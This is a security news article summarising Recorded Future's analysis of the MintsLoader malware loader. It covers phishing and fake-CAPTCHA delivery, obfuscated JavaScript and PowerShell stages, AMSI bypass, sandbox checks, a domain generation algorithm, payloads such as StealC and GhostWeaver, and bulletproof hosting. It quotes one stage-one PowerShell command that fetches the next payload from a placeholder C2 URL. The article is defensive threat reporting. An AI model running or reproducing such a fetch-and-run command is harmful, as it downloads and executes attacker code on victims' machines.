Pierluigi Paganini
May 05, 2025
Recorded Future researchers observed MintsLoader delivering payloads like GhostWeaver via obfuscated scripts, evading detection with sandbox/VM checks, and uses DGA and HTTP C2.
MintsLoader is a malware loader that was first spotted in 2024, the loader has been observed delivering various follow-on payloads like StealC and a modified version of the Berkeley Open Infrastructure for Network Computing (BOINC) client.
it implements a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts. The malware supports sandbox and virtual machine evasion techniques, a domain generation algorithm (DGA), and HTTP-based command-and-control (C2) communications.
MintsLoader is used by several threat groups, notably TAG-124. The attack chain commences via phishing messages, fake browser updates, and invoice lures through Italy’s PEC email system.
In early 2025, Recorded Future researchers observed a phishing campaign targeting the U.S. and European energy, oil, gas, and legal sectors; attackers attempted to deliver the MintsLoader vloader ia malicious JavaScript or fake verification pages.
“In both cases, the result was the execution of MintsLoader’s PowerShell-based second stage on the victim’s machine. This loader pulled down the final payloads, notably the StealC infostealer and a modified BOINC client build.” reads the report published by Recorded Future. “The campaign leveraged fake CAPTCHA verification pages (ClickFix/KongTuke lures) to trick users into executing a copied PowerShell command, which downloaded and ran MintsLoader”
The experts observed other infection chains that used fake invoice files (e.g., “Fattura####.js”) to deliver MintsLoader, mainly targeting industrial and professional sectors in North America and Europe.
MintsLoader’s first stage is a heavily obfuscated JavaScript file designed to execute a PowerShell command that downloads the second stage from a remote server. The researchers identified three variants of the loader: one with cleartext PowerShell, another using character replacement, and a third with Base64 encoding. Despite the differences, all variants aim to run a PowerShell command (e.g., curl -useb http://[domain]/1.php?s=[campaign]) to fetch the next payload. This stage also uses evasion techniques like junk code and disguised commands to bypass detection.
In stage two of MintsLoader, the malicious code downloads a PowerShell script from a command-and-control (C2) server via an HTTP GET request. This script contains a Base64-encoded payload that is XOR-decoded and decompressed to reveal heavily obfuscated code. The script disables AMSI protections and runs multiple system checks, such as VM detection, DAC type, and cache memory purpose, to generate a unique key sent to the C2. The C2 delivers a final payload or a decoy based on the unique key.
Based on the system’s characteristics and campaign ID, the script constructs a dynamic domain using a simple domain generation algorithm (DGA) to fetch stage three. If the target passes the checks, the loader downloads advanced malware like GhostWeaver, a PowerShell-based RAT with TLS-encrypted C2 communication and capabilities to redeploy MintsLoader. If the system fails validation, the C2 may deliver a decoy executable like AsyncRAT, which has led to misclassifications in threat reports.
Recorded Future found MintsLoader C2 servers initially on BLNWX, later expanding to ISPs like Stark Industries and SCALAXY-AS, linked to Russian bulletproof host Inferno Solutions.
“The switch to SCALAXY-AS and Stark Industries Solutions suggests that MintsLoader operators have shifted from relying on anonymous virtual private server (VPS) providers to more traditional bulletproof hosters, likely in an effort to harden their infrastructure against takedown attempts and enhance operational stability.” concludes the report that includes indicators of compromise (IoCs).
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, malware)
